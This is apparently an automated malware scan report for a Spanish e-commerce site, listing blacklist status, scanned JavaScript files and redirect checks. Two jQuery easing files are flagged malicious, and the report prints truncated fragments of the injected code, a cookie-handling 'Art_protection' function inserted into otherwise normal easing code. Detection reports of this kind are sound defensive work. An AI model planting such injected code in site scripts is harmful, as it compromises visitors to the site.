Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mdfk.es
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mdfk.es/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://mdfk.es/ | HTTP/1.1 302 Found Connection: close Date: Sat, 20 Sep 2014 07:07:28 GMT Accept-Ranges: bytes Age: 0 Location: http://www.mdfk.es/ Server: Apache/2 Content-Length: 203 Content-Type: text/html; charset=iso-8859-1 X-Powered-By: PHP/5.3.13 | clean |
http://www.mdfk.es/ | 200 OK Content-Length: 34704 Content-Type: text/html | clean |
http://www.mdfk.es/js/jquery/jquery-1.7.2.min.js | 200 OK Content-Length: 95723 Content-Type: application/x-javascript | clean |
http://mdfk.es/js/jquery/plugins/jquery.easing.js | 200 OK Content-Length: 5850 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( return c*(7.5625*(t-=(1.5/2.75))*t + .75) + b; } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
http://mdfk.es/js/tools.js | 200 OK Content-Length: 9915 Content-Type: application/x-javascript | clean |
http://mdfk.es/modules/azgallery/js/slimbox2.js | 200 OK Content-Length: 5032 Content-Type: application/x-javascript | clean |
http://mdfk.es/modules/blockcart/ajax-cart.js | 200 OK Content-Length: 27527 Content-Type: application/x-javascript | clean |
http://mdfk.es/modules/blocktopmenu/js/hoverIntent.js | 200 OK Content-Length: 4069 Content-Type: application/x-javascript | clean |
http://mdfk.es/modules/blocktopmenu/js/superfish-modified.js | 200 OK Content-Length: 4661 Content-Type: application/x-javascript | clean |
http://mdfk.es/modules/homeslider/js/jquery.bxSlider.min.js | 200 OK Content-Length: 23487 Content-Type: application/x-javascript | clean |
http://mdfk.es/modules/homeslider/js/homeslider.js | 200 OK Content-Length: 2358 Content-Type: application/x-javascript | clean |
http://www.mdfk.es/modules/elevatezoom/js/jquery.elevatezoom.min.js | 200 OK Content-Length: 34275 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://www.mdfk.es/modules/homeslider/js/rhinoslider-1.05.min.js | 200 OK Content-Length: 19352 Content-Type: application/x-javascript | clean |
http://www.mdfk.es/modules/homeslider/js/mousewheel.js | 200 OK Content-Length: 2288 Content-Type: application/x-javascript | clean |
http://www.mdfk.es/modules/homeslider/js/easing.js | 200 OK Content-Length: 9593 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); Antivirus reports:
| ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mdfk.es
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 20 Sep 2014 07:07:28 GMT
Accept-Ranges: bytes
Age: 0
Location: http://www.mdfk.es/
Server: Apache/2
Content-Length: 203
Content-Type: text/html; charset=iso-8859-1
X-Powered-By: PHP/5.3.13
...203 bytes of data.
GET / HTTP/1.1
Host: mdfk.es
Result:
HTTP/1.1 302 Found
Connection: close
Date: Sat, 20 Sep 2014 07:07:28 GMT
Accept-Ranges: bytes
Age: 0
Location: http://www.mdfk.es/
Server: Apache/2
Content-Length: 203
Content-Type: text/html; charset=iso-8859-1
X-Powered-By: PHP/5.3.13
...203 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mdfk.es
Referer: http://www.google.com/search?q=mdfk.es
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mdfk.es
Referer: http://www.google.com/search?q=mdfk.es
Result:
The result is similar to the first query. There are no suspicious redirects found.